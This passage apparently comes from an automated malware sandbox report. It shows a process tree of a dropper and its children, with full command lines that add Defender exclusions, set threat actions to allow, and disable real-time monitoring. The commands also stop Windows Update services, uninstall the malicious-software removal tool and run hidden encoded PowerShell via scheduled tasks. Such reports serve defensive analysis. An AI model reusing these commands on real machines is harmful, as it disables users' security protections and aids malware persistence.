                                                                                                                                                                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                              PID:5316
                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:5228
                                                                                                                                                                                • C:\Windows\system32\wusa.exe
                                                                                                                                                                                  wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                                                  5⤵
                                                                                                                                                                                    PID:5728
                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                  C:\Windows\system32\sc.exe stop UsoSvc
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:4844
                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:5124
                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                  C:\Windows\system32\sc.exe stop wuauserv
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:3712
                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                  C:\Windows\system32\sc.exe stop bits
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:5072
                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                  C:\Windows\system32\sc.exe stop dosvc
                                                                                                                                                                                  4⤵
                                                                                                                                                                                  • Launches sc.exe
                                                                                                                                                                                  PID:5660
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                PID:6124
                                                                                                                                                                              • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                                                "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4252
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:5468
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                  PID:5668
                                                                                                                                                                                • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                                                  "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4288
                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                    PID:5916
                                                                                                                                                                                  • C:\ProgramData\wikombernizc\reakuqnanrkn.exe
                                                                                                                                                                                    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5432
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                      PID:5584
                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                    explorer.exe
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:5472
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS20F1.tmp\Install.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS20F1.tmp\Install.exe it /WDididAMUT 385118 /S
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:3040
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:924
                                                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4968
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:2944
                                                                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                      PID:5924
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:2916
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:4768
                                                                                                                                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                            PID:3448
                                                                                                                                                                                                      • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:3476
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                              PID:4808
                                                                                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:2984
                                                                                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5784
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                    PID:4528
                                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:5472
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1316
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                          PID:4348
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                            PID:564
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                                                                                              "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:2300
                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:1228
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:1548
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ADJLsahCU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DQANlvmTAvZU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PZjcxajBIsNTC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mWJfrhglotUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\VyWMmqtuSNndeGVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:1508
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /CREATE /TN "gDkhMFXvz" /SC once /ST 05:39:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:2056
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /run /I /tn "gDkhMFXvz"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:5468
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                schtasks /DELETE /F /TN "gDkhMFXvz"
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:2104
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /CREATE /TN "gKHMVxIqX" /SC once /ST 00:30:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                                  PID:2436
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                  schtasks /run /I /tn "gKHMVxIqX"
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:4204
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "gKHMVxIqX"
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:5132
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2368
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:4204
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                            PID:1596
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:5428
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                PID:4556
                                                                                                                                                                                                                                            • C:\ProgramData\Google\Chrome\updater.exe
